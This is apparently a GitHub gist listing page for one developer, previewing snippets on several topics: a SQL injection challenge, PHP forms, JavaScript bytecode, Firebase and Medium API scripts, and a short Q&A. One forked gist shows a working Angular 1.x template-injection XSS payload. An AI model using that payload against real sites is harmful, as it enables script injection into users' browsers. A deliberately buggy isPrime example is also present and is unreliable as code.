Skip to content

Instantly share code, notes, and snippets.

Avatar

Huli aszx87410

View GitHub Profile
View sqlinjection.md

SQL injection 小挑戰

說明

底下是兩個從實際案例修改而成的 SQL injection 小挑戰,很明顯有 SQL injection 的漏洞
要拿到 flag 不難,但我覺得有趣的是「要如何利用最少的 request,得到最多的資訊」
舉例來說,boolean based 一次只能拿到 true 或 false,資訊量就偏少
如果能直接 union 然後把結果 dump 出來,資訊量就大很多

因此這個挑戰的目的在於如何用最少的 request,得到最多的資訊量

@aszx87410
aszx87410 / AngularTI.md
Created Aug 18, 2021 — forked from mccabe615/AngularTI.md
Angular Template Injection Payloads
View AngularTI.md

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@aszx87410
aszx87410 / php_form_submit.md
Created Oct 5, 2020 — forked from jesperorb/php_form_submit.md
PHP form submitting with fetch + async/await
View php_form_submit.md

PHP Form submitting

If we have the following structure in our application:

  • 📁 application_folder_name
    • 📄 index.php
    • 📄 handle_form.php
    • 📄 main.js

And we fill our index.php with the following content just to get a basic website with a form working. You should be able to run this through a php-server of your choice.

@aszx87410
aszx87410 / README.md
Last active Feb 15, 2020
let vs var by investigating the bytecode generated by Node.js
View README.md

It's the reply to the question raised by @getify on his twitter:

here's a variation on the question... will JS engines exhibit much performance difference between these two loops?

for (var i = 0; i < 100000000; i++) {
   // do some stuff, but not closure
}

for (let i = 0; i < 100000000; i++) {
@aszx87410
aszx87410 / mediumUsersFollowedByCount.js
Created Jun 30, 2019 — forked from newhouse/mediumUsersFollowedByCount.js
Medium API: get number of followers for User
View mediumUsersFollowedByCount.js
/**
* Example of how to get the number of followers for a Medium.com User.
*
*
* Related links:
* https://github.com/Medium/medium-api-docs/issues/30#issuecomment-227911763
* https://github.com/Medium/medium-api-docs/issues/73
*/
// LODASH
@aszx87410
aszx87410 / isPrime.js
Created May 9, 2019
判斷質數錯誤範例
View isPrime.js
function isPrime(n) {
if (n === 1) return false;
for (let i = 2; i < n; i++) {
if (n % i === 0) {
return false;
} else {
return true;
}
}
}
View lidemy.md

能分享自學成為後端工程師的案例經驗嗎?

雖然我自己的課程是前後端都有教,而且兩者的比重其實前端多一些而已,但不知道是不是因為我自己是前端工程師的關係,我的學生們都對前端比較有興趣一點,所以大多數出去以後都在找前端工程師的工作。

找後端的應該也是有但還沒有成功案例,如果你是問自學而不是我的學生的案例的話,我這邊沒有案例可以分享,可能要自己 google 找找了。

胡立大大,請問你覺得寫程式作為一份工作,什麼是支持你一直走下去的動力?

熱情吧,從小時候就知道對寫程式很有興趣,有了熱情就能夠做下去,做下去就會越來越進步越來越專業然後得到相對的報酬或是讚賞 有了讚賞跟報酬以後就會越有自信繼續走下去,大概就是這樣的一個正向循環

View config.json
//.eslintrc
{
"env": {
"browser": true,
"es6": true,
"node": true,
"jest": true
},
"parser": "babel-eslint",
@aszx87410
aszx87410 / firebase_pre-request_script.js
Created Jan 10, 2018 — forked from moneal/firebase_pre-request_script.js
Postman pre-request script to create a Firebase authentication JWT header.
View firebase_pre-request_script.js
/**
* This script expects the global variables 'refresh_token' and 'firebase_api_key' to be set. 'firebase_api_key' can be found
* in the Firebase console under project settings then 'Web API Key'.
* 'refresh_token' as to be gathered from watching the network requests to https://securetoken.googleapis.com/v1/token from
* your Firebase app, look for the formdata values
*
* If all the data is found it makes a request to get a new token and sets a 'auth_jwt' environment variable and updates the
* global 'refresh_token'.
*
* Requests that need authentication should have a header with a key of 'Authentication' and value of '{{auth_jwt}}'
@aszx87410
aszx87410 / firebase_pre-request_script.js
Created Jan 10, 2018 — forked from moneal/firebase_pre-request_script.js
Postman pre-request script to create a Firebase authentication JWT header.
View firebase_pre-request_script.js
/**
* This script expects the global variables 'refresh_token' and 'firebase_api_key' to be set. 'firebase_api_key' can be found
* in the Firebase console under project settings then 'Web API Key'.
* 'refresh_token' as to be gathered from watching the network requests to https://securetoken.googleapis.com/v1/token from
* your Firebase app, look for the formdata values
*
* If all the data is found it makes a request to get a new token and sets a 'auth_jwt' environment variable and updates the
* global 'refresh_token'.
*
* Requests that need authentication should have a header with a key of 'Authentication' and value of '{{auth_jwt}}'